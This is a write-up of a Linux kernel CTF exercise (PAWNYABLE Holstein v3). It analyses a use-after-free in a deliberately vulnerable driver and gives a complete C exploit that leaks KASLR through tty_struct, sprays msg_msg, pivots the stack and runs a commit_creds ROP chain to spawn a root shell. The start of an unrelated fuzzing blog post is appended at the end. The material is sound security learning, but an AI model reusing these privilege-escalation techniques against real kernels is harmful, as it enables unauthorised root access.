Next, I started working on the first challenge which is a stack-based buffer overflow vulnerability in Holstein v1. This is a great starting place because right away you get control of the instruction pointer and from there, you’re learning about things like the way CTF players (and security researchers) often leverage kernel code execution to escalate privileges like prepare_kernel_creds and commit_creds.

You can write an exploit that bypasses mitigations or not, it’s up to you. I started slowly and wrote an exploit with no mitigations enabled, then slowly turned the mitigations up and changed the exploit as needed.

After that, I started working on a popular Linux kernel pwn challenge called “kernel-rop” from hxpCTF 2020. I followed along and worked alongside the following blogposts from @_lkmidas:

This was great because it gave me a chance to reinforce everything I had learned from the PAWNYABLE stack buffer overflow challenge and also I learned a few new things. I also used (https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/) to supplement some of the information.

As a bonus, I also wrote a version of the exploit that utilized a different technique to elevate privileges: overwriting modprobe_path.

After all this, I felt like I had a good enough base to get started on the UAF challenge.

UAF Challenge: Holstein v3

Some quick vulnerability analysis on the vulnerable driver provided by the author states the problem clearly.

char *g_buf = NULL;

static int module_open(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_open called\n");

  g_buf = kzalloc(BUFFER_SIZE, GFP_KERNEL);
  if (!g_buf) {
    printk(KERN_INFO "kmalloc failed");
    return -ENOMEM;
  }

  return 0;
}

When we open the kernel driver, char *g_buf gets assigned the result of a call to kzalloc().

static int module_close(struct inode *inode, struct file *file)
{
  printk(KERN_INFO "module_close called\n");
  kfree(g_buf);
  return 0;
}

When we close the kernel driver, g_buf is freed. As the author explains, this is a buggy code pattern since we can open multiple handles to the driver from within our program. Something like this can occur.

We’ve done nothing, g_buf = NULL
We’ve opened the driver, g_buf = 0xffff...a0, and we have fd1 in our program
We’ve opened the driver a second time, g_buf = 0xffff...b0 . The original value of 0xffff...a0 has been overwritten. It can no longer be freed and would cause a memory leak (not super important). We now have fd2 in our program
We close fd1 which calls kfree() on 0xffff...b0 and frees the same pointer we have a reference to with fd2.

At this point, via our access to fd2, we have a use after free since we can still potentially use a freed reference to g_buf. The module also allows us to use the open file descriptor with read and write methods.

static ssize_t module_read(struct file *file,
                           char __user *buf, size_t count,
                           loff_t *f_pos)
{
  printk(KERN_INFO "module_read called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_to_user(buf, g_buf, count)) {
    printk(KERN_INFO "copy_to_user failed\n");
    return -EINVAL;
  }

  return count;
}

static ssize_t module_write(struct file *file,
                            const char __user *buf, size_t count,
                            loff_t *f_pos)
{
  printk(KERN_INFO "module_write called\n");

  if (count > BUFFER_SIZE) {
    printk(KERN_INFO "invalid buffer size\n");
    return -EINVAL;
  }

  if (copy_from_user(g_buf, buf, count)) {
    printk(KERN_INFO "copy_from_user failed\n");
    return -EINVAL;
  }

  return count;
}

So with these methods, we are able to read and write to our freed object. This is great for us since we’re free to pretty much do anything we want. We are limited somewhat by the object size which is hardcoded in the code to 0x400.

At a high-level, UAFs are generally exploited by creating the UAF condition, so we have a reference to a freed object within our control, and then we want to cause the allocation of a different object to fill the space that was previously filled by our freed object.

So if we allocated a g_buf of size 0x400 and then freed it, we need to place another object in its place. This new object would then be the target of our reads and writes.

KASLR Bypass

The first thing we need to do is bypass KASLR by leaking some address that is a known static offset from the kernel image base. I started searching for objects that have leakable members and again, @ptrYudai came to the rescue with a catalog on useful Linux Kernel data structures for exploitation. This lead me to the tty_struct which is allocated on the same slab cache as our 0x400 buffer, the kmalloc-1024. The tty_struct has a field called tty_operations which is a pointer to a function table that is a static offset from the kernel base. So if we can leak the address of tty_operations we will have bypassed KASLR. This struct was used by NCCGROUP for the same purpose in their exploit of CVE-2022-32250.

It’s important to note that slab cache that we’re targeting is per-CPU. Luckily, the VM we’re given for the challenge only has one logical core so we don’t have to worry about CPU affinity for this exercise. On most systems with more than one core, we would have to worry about influencing one specific CPU’s cache.

So with our module_read ability, we will simply:

Free g_buf
Create dev_tty structs until one hopefully fills the freed space where g_buf used to live
Call module_read to get a copy of the g_buf which is now actually our dev_tty and then inspect the value of tty_struct->tty_operations.

Here are some snippets of code related to that from the exploit:

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

There’s a confusing part about ANDing off the lower 12 bits of the leaked value and that’s because I kept getting one of two values during multiple runs of the exploit within the same boot. This is probably because there’s two kinds of tty_structs that can be allocated and they are allocated in pairs. This if else if block just handles both cases and solves the kernel base for us. So at this point we have bypassed KASLR because we know the base address the kernel is loaded at.

RIP Control

Next, we need someway to high-jack execution. Luckily, we can use the same data structure, tty_struct as we can write to the object using module_write and we can overwrite the pointer value for tty_struct->ops.

struct tty_operations is a table of function pointers, and looks like this:

struct tty_struct * (*lookup)(struct tty_driver *driver,
			struct file *filp, int idx);
	int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
	void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
	int  (*open)(struct tty_struct * tty, struct file * filp);
	void (*close)(struct tty_struct * tty, struct file * filp);
	void (*shutdown)(struct tty_struct *tty);
	void (*cleanup)(struct tty_struct *tty);
	int  (*write)(struct tty_struct * tty,
		      const unsigned char *buf, int count);
	int  (*put_char)(struct tty_struct *tty, unsigned char ch);
	void (*flush_chars)(struct tty_struct *tty);
	unsigned int (*write_room)(struct tty_struct *tty);
	unsigned int (*chars_in_buffer)(struct tty_struct *tty);
	int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);
...SNIP...

These functions are invoked on the tty_struct when certain actions are performed on an instance of a tty_struct. For example, when the tty_struct’s controlling process exits, several of these functions are called in a row: close(), shutdown(), and cleanup().

So our plan, will be to:

Create UAF condition
Occupy free’d memory with tty_struct
Read a copy of the tty_struct back to us in userland
Alter the tty->ops value to point to a faked function table that we control
Write the new data back to the tty_struct which is now corrupted
Do something to the tty_struct that causes a function we control to be invoked

PAWNYABLE tells us that a popular target is invoking ioctl() as the function takes several arguments which are user-controlled.

int  (*ioctl)(struct tty_struct *tty,
		    unsigned int cmd, unsigned long arg);

From userland, we can supply the values for cmd and arg. This gives us some flexibility. The value we can provide for cmd is somewhat limited as an unsigned int is only 4 bytes. arg gives us a full 8 bytes of control over RDX. Since we can control the contents of RDX whenever we invoke ioctl(), we need to find a gadget to pivot the stack to some code in the kernel heap that we can control. I found such a gadget here:

0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;

We will push a value from RDX onto the stack, and then later pop that value into RSP. When ioctl() returns, we will return to whatever value we called ioctl() with in arg. So the control flow will go something like:

Invoke ioctl() on our corrupted tty_struct
ioctl() has been overwritten by a stack-pivot gadget that places the location of our ROP chain into RSP
ioctl() returns execution to our ROP chain

So now we have a new problem, how do we create a fake function table and ROP chain in the kernel heap AND figure out where we stored them?

Creating/Locating a ROP Chain and Fake Function Table

This is where I started to diverge from the author’s exploitation strategy. I couldn’t quite follow along with the intended solution for this problem, so I began searching for other ways. With our extremely powerful read capability in mind, I remembered the msg_msg struct from @ptrYudai’s aforementioned structure catalog, and realized that the structure was perfect for our purposes as it:

Stores arbitrary data inline in the structure body (not via a pointer to the heap)
Contains a linked-list member that contains the addresses to prev and next messages within the same kernel message queue

So quickly, a strategy began to form. We could:

Create our ROP chain and Fake Function table in a buffe
Send the buffer as the body of a msg_msg struct
Use our module_read capability to read the msg_msg->list.next and msg_msg->list.prev values to know where in the heap at least two of our messages were stored

With this ability, we would know exactly what address to supply as an argument to ioctl() when we invoke it in order to pivot the stack into our ROP chain. Here is some code related to that from the exploit:

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calcuate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

I got a bit wordy with the comments in this block, but it’s for good reason. I didn’t want the exploit to ruin the kernel state, I wanted to exit cleanly. This presented a problem as we are completely hi-jacking the ops function table which the kernel will use to cleanup our tty_struct. So I found a gadget that simply performs a ret operation, and overwrote the function pointers for close(), shutdown(), and cleanup() so that when they are invoked, they simply return and the kernel is apparently fine with this and doesn’t panic.

So our message body looks something like: <—-ROP—-Faked Function Table—->

Here is the code I used to overwrite the tty_struct->ops pointer:

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

So now that we know where our ROP chain is, and where our faked function table is, and we have the perfect stack pivot gadget, the rest of this process is simply building a real ROP chain which I will leave out of this post.

As a first timer, this tiny bit of creativity to leverage the read ability to leak the addresses of msg_msg structs was enough to get me hooked. Here is a picture of the exploit in action:

Miscellaneous

There were some things I tried to do to increase the exploit’s reliability.

One was to check the magic value in the leaked tty_structs to make sure a tty_struct had actually filled our freed memory and not another object. This is extremely convenient! All tty_structs have 0x5401 at tty->magic.

Another thing I did was spray msg_msg structs with an easily recognizable message type of 0x1337. This way when leaked, I could easily verify I was in fact leaking msg_msg contents and not some other arbitrary data structure. Another thing you could do would be to make sure supposed kernel addresses start with 0xffff.

Finally, there was the patching of the clean-up-related function pointers in tty->ops.

Exploit Code

// One liner to add exploit to filesystem
// gcc exploit.c -o exploit -static && cp exploit rootfs && cd rootfs && find . -print0 | cpio -o --format=newc --null --owner=root > ../rootfs.cpio && cd ../

#include <stdio.h> /* printf */
#include <sys/types.h> /* open */
#include <sys/stat.h> /* open */
#include <fcntl.h> /* open */
#include <stdlib.h> /* exit */
#include <stdint.h> /* int_t's */
#include <unistd.h> /* getuid */
#include <string.h> /* memset */
#include <sys/ipc.h> /* msg_msg */ 
#include <sys/msg.h> /* msg_msg */
#include <sys/ioctl.h> /* ioctl */
#include <stdarg.h> /* va_args */
#include <stdbool.h> /* true, false */ 

#define DEV "/dev/holstein"
#define PTMX "/dev/ptmx"

#define PTMX_SPRAY (size_t)50       // Number of terminals to allocate
#define MSG_SPRAY (size_t)32        // Number of msg_msg's per queue
#define NUM_QUEUE (size_t)4         // Number of msg queues
#define MSG_SZ (size_t)512          // Size of each msg_msg, modulo 8 == 0
#define GBUF_SZ (size_t)0x400       // Size of g_buf in driver

// User state globals
uint64_t user_cs;
uint64_t user_ss;
uint64_t user_rflags;
uint64_t user_sp;

// Mutable globals, when in Rome
uint64_t base;
uint64_t rop_addr;
uint64_t fake_table;
uint64_t ioctl_ptr;
int open_ptmx[PTMX_SPRAY] = { 0 };          // Store fds for clean up/ioctl()
int num_ptmx = 0;                           // Number of open fds
int msg_queue[NUM_QUEUE] = { 0 };           // Initialized message queues
int num_queue = 0;

// Misc constants. 
const uint64_t rop_len = 200;
const uint64_t ioctl_off = 12 * sizeof(uint64_t);

// Gadgets
// 0x723c0: commit_creds
uint64_t commit_creds;
// 0x72560: prepare_kernel_cred
uint64_t prepare_kernel_cred;
// 0x800e10: swapgs_restore_regs_and_return_to_usermode
uint64_t kpti_tramp;
// 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret; (stack pivot)
uint64_t push_rdx;
// 0x35738d: pop rdi; ret;
uint64_t pop_rdi;
// 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
uint64_t xchg_rdi_rax;
// 0x32afea: ret;
uint64_t ret;

void err(const char* format, ...) {
    if (!format) {
        exit(-1);
    }

    fprintf(stderr, "%s", "[!] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
    exit(-1);
}

void info(const char* format, ...) {
    if (!format) {
        return;
    }
    
    fprintf(stderr, "%s", "[*] ");
    va_list args;
    va_start(args, format);
    vfprintf(stderr, format, args);
    va_end(args);
    fprintf(stderr, "%s", "\n");
}

void save_state(void) {
    __asm__(
        ".intel_syntax noprefix;"   
        "mov user_cs, cs;"
        "mov user_ss, ss;"
        "mov user_sp, rsp;"
        // Push CPU flags onto stack
        "pushf;"
        // Pop CPU flags into var
        "pop user_rflags;"
        ".att_syntax;"
    );
}

// Should spawn a root shell
void pop_shell(void) {
    uid_t uid = getuid();
    if (uid != 0) {
        err("We are not root, wtf?");
    }

    info("We got root, spawning shell!");
    system("/bin/sh");
    exit(0);
}

// Open a char device, just exit on error, this is exploit code
int open_device(char *dev, int flags) {
    int fd = -1;
    if (!dev) {
        err("NULL ptr given to `open_device()`");
    }

    fd = open(dev, flags);
    if (fd < 0) {
        err("Failed to open '%s'", dev);
    }

    return fd;
}

// Spray kmalloc-1024 sized '/dev/ptmx' structures on the kernel heap
void alloc_ptmx() {
    int fd = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
    if (fd < 0) {
        err("Failed to open /dev/ptmx");
    }

    open_ptmx[num_ptmx] = fd;
    num_ptmx++;
}

// Check to see if we have a reference to a tty_struct by reading in the magic
// number for the current allocation in our slab
bool found_ptmx(int fd) {
    unsigned char magic_buf[4];
    if (fd < 0) {
        err("Bad fd given to `found_ptmx()`\n");
    }

    ssize_t bytes_read = read(fd, magic_buf, 4);
    if (bytes_read != (ssize_t)bytes_read) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    if (*(int32_t *)magic_buf != 0x5401) {
        return false;
    }

    return true;
}

// Leak a tty_struct->ops field which is constant offset from kernel base
uint64_t leak_ops(int fd) {
    if (fd < 0) {
        err("Bad fd given to `leak_ops()`");
    }

    /* tty_struct {
        int magic;      // 4 bytes
        struct kref;    // 4 bytes (single member is an int refcount_t)
        struct device *dev; // 8 bytes
        struct tty_driver *driver; // 8 bytes
        const struct tty_operations *ops; (offset 24 (or 0x18))
        ...
    } */

    // Read first 32 bytes of the structure
    unsigned char *ops_buf = calloc(1, 32);
    if (!ops_buf) {
        err("Failed to allocate ops_buf");
    }

    ssize_t bytes_read = read(fd, ops_buf, 32);
    if (bytes_read != (ssize_t)32) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    uint64_t ops = *(uint64_t *)&ops_buf[24];
    info("tty_struct->ops: 0x%lx", ops);

    // Solve for kernel base, keep the last 12 bits
    uint64_t test = ops & 0b111111111111;

    // These magic compares are for static offsets on this kernel
    if (test == 0xb40ULL) {
        return ops - 0xc39b40ULL;
    }

    else if (test == 0xc60ULL) {
        return ops - 0xc39c60ULL;
    }

    else {
        err("Got an unexpected tty_struct->ops ptr");
    }
}

void solve_gadgets(void) {
    // 0x723c0: commit_creds
    commit_creds = base + 0x723c0ULL;
    printf("    >> commit_creds located @ 0x%lx\n", commit_creds);

    // 0x72560: prepare_kernel_cred
    prepare_kernel_cred = base + 0x72560ULL;
    printf("    >> prepare_kernel_cred located @ 0x%lx\n", prepare_kernel_cred);

    // 0x800e10: swapgs_restore_regs_and_return_to_usermode
    kpti_tramp = base + 0x800e10ULL + 22; // 22 offset, avoid pops
    printf("    >> kpti_tramp located @ 0x%lx\n", kpti_tramp);

    // 0x14fbea: push rdx; xor eax, 0x415b004f; pop rsp; pop rbp; ret;
    push_rdx = base + 0x14fbeaULL;
    printf("    >> push_rdx located @ 0x%lx\n", push_rdx);

    // 0x35738d: pop rdi; ret;
    pop_rdi = base + 0x35738dULL;
    printf("    >> pop_rdi located @ 0x%lx\n", pop_rdi);

    // 0x487980: xchg rdi, rax; sar bh, 0x89; ret;
    xchg_rdi_rax = base + 0x487980ULL;
    printf("    >> xchg_rdi_rax located @ 0x%lx\n", xchg_rdi_rax);

    // 0x32afea: ret;
    ret = base + 0x32afeaULL;
    printf("    >> ret located @ 0x%lx\n", ret);
}

// Initialize a kernel message queue
int init_msg_q(void) {
    int msg_qid = msgget(IPC_PRIVATE, 0666 | IPC_CREAT);
    if (msg_qid == -1) {
        err("`msgget()` failed to initialize queue");
    }

    msg_queue[num_queue] = msg_qid;
    num_queue++;
}

// Allocate one msg_msg on the heap
size_t send_message() {
    // Calcuate current queue
    if (num_queue < 1) {
        err("`send_message()` called with no message queues");
    }
    int curr_q = msg_queue[num_queue - 1];

    // Send message
    size_t fails = 0;
    struct msgbuf {
        long mtype;
        char mtext[MSG_SZ];
    } msg;

    // Unique identifier we can use
    msg.mtype = 0x1337;

    // Construct the ROP chain
    memset(msg.mtext, 0, MSG_SZ);

    // Pattern for offsets (debugging)
    uint64_t base = 0x41;
    uint64_t *curr = (uint64_t *)&msg.mtext[0];
    for (size_t i = 0; i < 25; i++) {
        uint64_t fill = base << 56;
        fill |= base << 48;
        fill |= base << 40;
        fill |= base << 32;
        fill |= base << 24;
        fill |= base << 16;
        fill |= base << 8;
        fill |= base;
        
        *curr++ = fill;
        base++; 
    }

    // ROP chain
    uint64_t *rop = (uint64_t *)&msg.mtext[0];
    *rop++ = pop_rdi; 
    *rop++ = 0x0;
    *rop++ = prepare_kernel_cred; // RAX now holds ptr to new creds
    *rop++ = xchg_rdi_rax; // Place creds into RDI 
    *rop++ = commit_creds; // Now we have super powers
    *rop++ = kpti_tramp;
    *rop++ = 0x0; // pop rax inside kpti_tramp
    *rop++ = 0x0; // pop rdi inside kpti_tramp
    *rop++ = (uint64_t)pop_shell; // Return here
    *rop++ = user_cs;
    *rop++ = user_rflags;
    *rop++ = user_sp;
    *rop   = user_ss;

    /* struct tty_operations {
        struct tty_struct * (*lookup)(struct tty_driver *driver,
                struct file *filp, int idx);
        int  (*install)(struct tty_driver *driver, struct tty_struct *tty);
        void (*remove)(struct tty_driver *driver, struct tty_struct *tty);
        int  (*open)(struct tty_struct * tty, struct file * filp);
        void (*close)(struct tty_struct * tty, struct file * filp);
        void (*shutdown)(struct tty_struct *tty);
        void (*cleanup)(struct tty_struct *tty);
        int  (*write)(struct tty_struct * tty,
                const unsigned char *buf, int count);
        int  (*put_char)(struct tty_struct *tty, unsigned char ch);
        void (*flush_chars)(struct tty_struct *tty);
        unsigned int (*write_room)(struct tty_struct *tty);
        unsigned int (*chars_in_buffer)(struct tty_struct *tty);
        int  (*ioctl)(struct tty_struct *tty,
                unsigned int cmd, unsigned long arg);
        ...
    } */

    // Populate the 12 function pointers in the table that we have created.
    // There are 3 handlers that are invoked for allocated tty_structs when 
    // their controlling process exits, they are close(), shutdown(),
    // and cleanup(). We have to overwrite these pointers for when we exit our
    // exploit process or else the kernel will panic with a RIP of 
    // 0xdeadbeefdeadbeef. We overwrite them with a simple ret gadget
    uint64_t *func_table = (uint64_t *)&msg.mtext[rop_len];
    for (size_t i = 0; i < 12; i++) {
        // If i == 4, we're on the close() handler, set to ret gadget
        if (i == 4) { *func_table++ = ret; continue; }

        // If i == 5, we're on the shutdown() handler, set to ret gadget
        if (i == 5) { *func_table++ = ret; continue; }

        // If i == 6, we're on the cleanup() handler, set to ret gadget
        if (i == 6) { *func_table++ = ret; continue; }

        // Magic value for debugging
        *func_table++ = 0xdeadbeefdeadbe00 + i;
    }

    // Put our gadget address as the ioctl() handler to pivot stack
    *func_table = push_rdx;

    // Spray msg_msg's on the heap
    if (msgsnd(curr_q, &msg, MSG_SZ, IPC_NOWAIT) == -1) {
        fails++;
    }

    return fails;
}

// Check to see if we have a reference to one of our msg_msg structs
bool found_msg(int fd) {
    // Read out the msg_msg
    unsigned char msg_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, msg_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read from holstein");
    }

    /* msg_msg {
        struct list_head m_list {
            struct list_head *next, *prev;
        } // 16 bytes
        long m_type; // 8 bytes
        int m_ts; // 4 bytes
        struct msg_msgseg* next; // 8 bytes
        void *security; // 8 bytes

        ===== Body Starts Here (offset 48) =====
    }*/ 

    // Some heuristics to see if we indeed have a good msg_msg
    uint64_t next = *(uint64_t *)&msg_buf[0];
    uint64_t prev = *(uint64_t *)&msg_buf[sizeof(uint64_t)];
    int64_t m_type = *(uint64_t *)&msg_buf[sizeof(uint64_t) * 2];

    // Not one of our msg_msg structs
    if (m_type != 0x1337L) {
        return false;
    }

    // We have to have valid pointers
    if (next == 0 || prev == 0) {
        return false;
    }

    // I think the pointers should be different as well
    if (next == prev) {
        return false;
    }

    info("Found msg_msg struct:");
    printf("    >> msg_msg.m_list.next: 0x%lx\n", next);
    printf("    >> msg_msg.m_list.prev: 0x%lx\n", prev);
    printf("    >> msg_msg.m_type: 0x%lx\n", m_type);

    // Update rop address
    rop_addr = 48 + next;
    
    return true;
}

void overwrite_ops(int fd) {
    unsigned char g_buf[GBUF_SZ] = { 0 };
    ssize_t bytes_read = read(fd, g_buf, GBUF_SZ);
    if (bytes_read != (ssize_t)GBUF_SZ) {
        err("Failed to read enough bytes from fd: %d", fd);
    }

    // Overwrite the tty_struct->ops pointer with ROP address
    *(uint64_t *)&g_buf[24] = fake_table;
    ssize_t bytes_written = write(fd, g_buf, GBUF_SZ);
    if (bytes_written != (ssize_t)GBUF_SZ) {
        err("Failed to write enough bytes to fd: %d", fd);
    }
}

int main(int argc, char *argv[]) {
    int fd1;
    int fd2;
    int fd3;
    int fd4;
    int fd5;
    int fd6;

    info("Saving user space state...");
    save_state();

    info("Freeing fd1...");
    fd1 = open_device(DEV, O_RDWR);
    fd2 = open(DEV, O_RDWR);
    close(fd1);

    // Allocate '/dev/ptmx' structs until we allocate one in our free'd slab
    info("Spraying tty_structs...");
    size_t p_remain = PTMX_SPRAY;
    while (p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found one of our tty_structs
        if (found_ptmx(fd2)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Leaking tty_struct->ops...");
    base = leak_ops(fd2);
    info("Kernel base: 0x%lx", base);

    // Clean up open fds
    info("Cleaning up our tty_structs...");
    for (size_t i = 0; i < num_ptmx; i++) {
        close(open_ptmx[i]);
        open_ptmx[i] = 0;
    }
    num_ptmx = 0;

    // Solve the gadget addresses now that we have base
    info("Solving gadget addresses");
    solve_gadgets();

    // Create a hole for a msg_msg
    info("Freeing fd3...");
    fd3 = open_device(DEV, O_RDWR);
    fd4 = open_device(DEV, O_RDWR);
    close(fd3);

    // Allocate msg_msg structs until we allocate one in our free'd slab
    size_t q_remain = NUM_QUEUE;
    size_t fails = 0;
    while (q_remain--) {
        // Initialize a message queue for spraying msg_msg structs
        init_msg_q();
        printf("    >> msg_msg queue(s) initialized: %lu\n",
            NUM_QUEUE - q_remain);
        
        // Spray messages for this queue
        for (size_t i = 0; i < MSG_SPRAY; i++) {
            fails += send_message();
        }

        // Check to see if we found a msg_msg struct
        if (found_msg(fd4)) {
            break;
        }
        
        if (q_remain == 0) { err("Failed to find msg_msg struct"); }
    }
    
    // Solve our ROP chain address
    info("`msgsnd()` failures: %lu", fails);
    info("ROP chain address: 0x%lx", rop_addr);
    fake_table = rop_addr + rop_len;
    info("Fake tty_struct->ops function table: 0x%lx", fake_table);
    ioctl_ptr = fake_table + ioctl_off;
    info("Fake ioctl() handler: 0x%lx", ioctl_ptr);

    // Do a 3rd UAF
    info("Freeing fd5...");
    fd5 = open_device(DEV, O_RDWR);
    fd6 = open_device(DEV, O_RDWR);
    close(fd5);

    // Spray more /dev/ptmx terminals
    info("Spraying tty_structs...");
    p_remain = PTMX_SPRAY;
    while(p_remain--) {
        alloc_ptmx();
        printf("    >> tty_struct(s) alloc'd: %lu\n", PTMX_SPRAY - p_remain);

        // Check to see if we found a tty_struct
        if (found_ptmx(fd6)) {
            break;
        }

        if (p_remain == 0) { err("Failed to find tty_struct"); }
    }

    info("Found new tty_struct");
    info("Overwriting tty_struct->ops pointer with fake table...");
    overwrite_ops(fd6);
    info("Overwrote tty_struct->ops");

    // Spam IOCTL on all of our '/dev/ptmx' fds
    info("Spamming `ioctl()`...");
    for (size_t i = 0; i < num_ptmx; i++) {
        ioctl(open_ptmx[i], 0xcafebabe, rop_addr - 8); // pop rbp; ret;
    }

    return 0;
}

Fuzzing Like A Caveman 6: Binary Only Snapshot Fuzzing Harness

The Human Machine Interface

h0mbre

2 April 2022 at 04:00

Introduction

It’s been a while since I’ve done one of these, and one of my goals this year is to do more so here we are. A side project of mine is kind of reaching a good stopping point so I’ll have more free-time to do my own research and blog again. Looking forward to sharing more and more this year.

One of the most common questions that comes up in beginner fuzzing circles (of which I’m obviously a member) is how to harness a target so that it can be fuzzed in memory, as some would call in ‘persistent’ fashion, in order to gain performance. Persistent fuzzing has a niche use-case where the target doesn’t touch much global state from fuzzcase to fuzzcase, an example would be a tight fuzzing loop for a single API in a library, or maybe a single function in a binary.

This style of fuzzing is faster than re-executing the target from scratch over and over as we bypass all the heavy syscalls/kernel routines associated with creating and destroying task structs.

However, with binary targets for which we don’t have source code, it’s sometimes hard to discern what global state we’re affecting while executing any code path without some heavy reverse engineering (disgusting, work? gross). Additionally, we often want to fuzz a wider loop. It doesn’t do us much good to fuzz a function which returns a struct that is then never read or consumed in our fuzzing workflow. With these things in mind, we often find that ‘snapshot’ fuzzing would be a more robust workflow for binary targets, or even production binaries for which, we have source, but have gone through the sausage factory of enterprise build systems.

So today, we’re going to learn how to take an arbitrary binary only target that takes an input file from the user and turn it into a target that takes its input from memory instead and lends itself well to having its state reset between fuzzcases.

Target (Easy Mode)

